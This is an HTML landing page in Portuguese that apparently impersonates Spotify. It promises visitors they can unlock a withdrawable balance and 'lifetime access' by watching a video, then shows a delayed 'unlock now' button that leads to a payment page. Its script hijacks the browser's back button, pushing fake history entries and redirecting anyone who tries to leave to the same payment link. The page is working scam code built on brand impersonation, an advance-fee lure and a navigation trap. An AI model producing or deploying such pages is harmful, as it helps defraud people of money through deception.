<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Spotify Avaliação - VSL</title>
   
    <script
    src="https://cdn.utmify.com.br/scripts/utms/latest.js"
    data-utmify-prevent-subids
    async
    defer
  ></script>
  
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;700&display=swap">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Montserrat', sans-serif;
            background-color: #FFFFFF;
            color: #333;
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        .header {
            width: 100%;
            background-color: #1DB954;
            color: white;
            font-weight: bold;
            text-align: center;
            padding: 10px;
            font-size: 16px;
        }

        #produto1 {
            width: 100%;
            max-width: 400px;
            text-align: center;
            padding: 15px;
            margin-bottom: 20px;
        }

        #produto1 h4 {
            color: #1DB954;
            font-size: 18px;
            margin-bottom: 10px;
        }

        .video-container {
            position: relative;
            width: 100%;
            max-width: 500px;
            margin: 0 auto;
            padding-top: 56.25%; /* Proporção 16:9 */
        }

        .video-container video {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
        }

        .centralizar {
            width: 100%;
            display: flex;
            justify-content: center;
        }

        button {
            background-color: #1DB954;
            color: white;
            border: none;
            border-radius: 5px;
            width: 85%;
            max-width: 300px;
            height: 50px;
            font-weight: bold;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        button:hover {
            background-color: #17a74a;
        }
    </style>
</head>

<body>
    <div class="header">
        ASSISTA O VÍDEO ABAIXO PARA LIBERAR SEU SAQUE E ACESSO VITALÍCIO.
    </div>

    <div id="produto1">
        <h4>DESBLOQUEIO DE SALDO</h4>
        <p>Veja como liberar seu saque assistindo ao vídeo.</p>

        <div class="video-container">
            <video src="Spotify Avaliacao - VSL.mp4" autoplay ></video>
        </div>
    </div>
    <div id="botaoDesbloquear" class="centralizar" style="margin-top: 20px; display: none; text-align: center;">
        <a id="desbloquearLink" href="https://pay.risepay.com.br/Pay/82446b1a98834d07a24e0d971a2f89e1" style="width: 100%; text-decoration: none;">
            <button style="display: inline-block; margin: 0 auto;">DESBLOQUEAR AGORA</button>
        </a>
    </div>

   <script>
     document.addEventListener("DOMContentLoaded", function() {
            // Função para mostrar o botão após 35 segundos
            setTimeout(function() {
                document.getElementById("botaoDesbloquear").style.display = "flex";
            }, 35000); // 35 segundos de delay

            // Script para adicionar parâmetros de URL
            const urlParams = new URLSearchParams(window.location.search);
            const paramsString = urlParams.toString();
            const desbloquearLink = document.getElementById("desbloquearLink");

            if (paramsString) {
                desbloquearLink.href += `?${paramsString}`;
            }
        });
   </script>

    <script>
        const link = "https://pay.risepay.com.br/Pay/82446b1a98834d07a24e0d971a2f89e1";

        function setBackRedirect(url) {
            let urlBackRedirect = url;
            urlBackRedirect = urlBackRedirect.trim() +
                (urlBackRedirect.indexOf('?') > 0 ? '&' : '?') +
                document.location.search.replace('?', '').toString();

            history.pushState({}, '', location.href);
            history.pushState({}, '', location.href);
            history.pushState({}, '', location.href);

            window.addEventListener('popstate', () => {
                console.log('onpopstate', urlBackRedirect);
                setTimeout(() => {
                    location.href = urlBackRedirect;
                }, 1);
            });
        }

        setBackRedirect(link);
    </script>
</body>
</html>
